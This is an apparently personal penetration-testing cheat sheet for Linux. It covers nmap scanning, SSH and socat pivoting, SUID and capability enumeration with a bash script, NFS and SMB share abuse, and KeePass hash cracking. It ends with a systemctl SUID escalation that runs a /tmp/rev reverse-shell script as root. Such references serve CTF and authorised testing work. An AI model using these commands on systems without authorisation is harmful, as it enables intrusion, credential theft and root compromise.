InfoSec enthusiast | pwn | RE | CTF | BugBounty

Linux Cheat-Sheet

What's here?

  • Some essential enumeration, pivoting and privesc commands. :smile:

Enum scripts/bins:


Host discovery (ping sweep; -sP is the old name for -sn):

nmap -sn "target range"

Port scanning:

Normal scan (nmap has no plain -o; use -oN for normal output, -oA for all formats):

nmap -sC -sV -p- "target ip" -oN output.txt    

Connect scan (useful with proxychains; add -Pn, because nmap's host-discovery probes don't go through the SOCKS proxy and can leak your real IP):

proxychains nmap -sT -Pn -p- "target ip" -oN output.txt  

Note: the full port range "-p-" is slow, and UDP scans are slower still.
UDP scan:

nmap -sU "target ip" -oN output.txt  

Port forwarding:

Local port forwarding (localhost:5555 on your box reaches remote_address:remote_port as seen from the SSH server):

ssh -L 5555:remote_address:remote_port user@remote_ip

Meterpreter version:

portfwd add -l "localport" -p "remoteport" -r "target host"

Remote port forwarding (port 5555 on the SSH server is sent back to local_address:local_port on your box, handy for reverse shells through a pivot):

ssh -R 5555:local_address:local_port user@remote_ip

Dynamic forwarding (SOCKS proxy on localhost:"localport"; point proxychains at it):

ssh -D "localport" user@remote_ip

Socat version (listen on 8080 and relay every connection to "target ip":9001):

socat tcp-listen:8080,reuseaddr,fork tcp:"target ip":9001

Binaries with file capabilities (cap_setuid, cap_dac_read_search, cap_sys_admin and friends are the interesting ones):

find / -type f -print0 2>/dev/null  |  xargs -0 getcap   2>/dev/null


/sbin/getcap -r / 2>/dev/null

Fast SMTP server (prints every received mail to stdout; the module defaults to localhost:8025, so bind 0.0.0.0:25 explicitly, which is why it needs sudo; smtpd was removed in Python 3.12):

sudo python -m smtpd -n -c DebuggingServer 0.0.0.0:25

SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Sudo check:

sudo -l

Check which process has a file open:

fuser "filename"
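The capability and SUID one-liners above dump everything, so most of the output is the usual ping/passwd/sudo noise. Here is an added example (my own wrapper, not part of the original cheat sheet) that turns the two checks into functions and filters the getcap output down to capabilities that usually lead straight to root. The capability list is my own heuristic, and the sample getcap lines in the usage comment are constructed, not captured from a real box:

```bash
#!/usr/bin/env bash
# Added example: SUID/SGID and capability enumeration as reusable functions.
# Usage:  ./enum.sh /        (no argument: only define the functions)

# Capabilities that usually give a direct privesc path when set on a binary
# a low-privileged user can execute. Heuristic list, adjust to taste.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner|cap_setfcap'

# List SUID and SGID regular files under a root directory (default /),
# staying on one filesystem and ignoring permission errors.
find_suid_bins() {
    local root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Read `getcap -r` output on stdin and keep only the entries that carry a
# dangerous capability. Handles both output styles:
#   /usr/bin/python3 = cap_setuid+ep        (older libcap)
#   /usr/bin/python3 cap_setuid=ep          (libcap >= 2.41)
# Capabilities within one entry are comma separated, hence the [ ,=] prefix.
flag_dangerous_caps() {
    grep -E "(^|[ ,=])(${DANGEROUS_CAPS})([=+,]|$)" || true
}

# Example of the filter on constructed getcap lines (not real output):
#   printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' \
#                 '/usr/bin/python3.8 = cap_setuid+ep' | flag_dangerous_caps
#   -> only the python3.8 line is printed.

if [ "$#" -gt 0 ]; then
    echo "[*] SUID/SGID files under $1:"
    find_suid_bins "$1"
    echo "[*] Binaries with dangerous capabilities under $1:"
    getcap -r "$1" 2>/dev/null | flag_dangerous_caps
fi
```

Run it as `./enum.sh /` on the target; the first list is what you diff against a clean install of the same distro, the second is usually short enough to check by hand against GTFOBins.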

NFS shares:

NFS trusts the UID the client presents, so if you can mount a share you can access any file on it by creating a local user with the same UID as the file's owner on the remote box. If the export is missing root_squash, root on your box is root on the share, which also lets you drop a root-owned SUID binary there and run it from the target.

mount -t nfs remoteip:/path /mount/point

SMB things:

List samba shares:

smbclient -L \\\\ip
smbmap -H ip -u user -p password

Connect to a share:

smbclient \\\\ip\\share_name -U "user"%"password"

Download everything (recursive, no prompts):

  smb: \> recurse on
  smb: \> prompt off
  smb: \> mget *

Mount a remote SMB share:

mount -t cifs '//remote_ip/share' /mount/point

Create a simple SMB server (impacket, handy for moving files to a Windows box):

smbserver.py -smb2support sharename $PWD

KeePass files:

If you find a KeePass database (.kdbx), it is protected by a master password, a key file, or both. To crack the master password (pass the key file with -k if one is required):

keepass2john -k MASTER.file file.kdbx  >> hash.txt
john --wordlist=wordlist hash.txt

Open it once cracked:

kpcli --kdb file.kdbx --key MASTER.file 

systemctl as SUID binary:

Create a custom service definition (WantedBy belongs in the [Install] section, not [Service]; systemd only warns about the misplaced key, but keep the unit valid):

echo '[Service]
Type=oneshot
ExecStart=/bin/bash /tmp/rev
[Install]
WantedBy=multi-user.target' > /tmp/.fade/fserv3.service
systemctl link /tmp/.fade/fserv3.service
systemctl start fserv3

systemctl start runs /tmp/rev as root right away :) ! The [Install] section only matters if you also enable the unit, in which case it runs again at boot (as long as /tmp is not cleaned before then).

updated_at 04-05-2020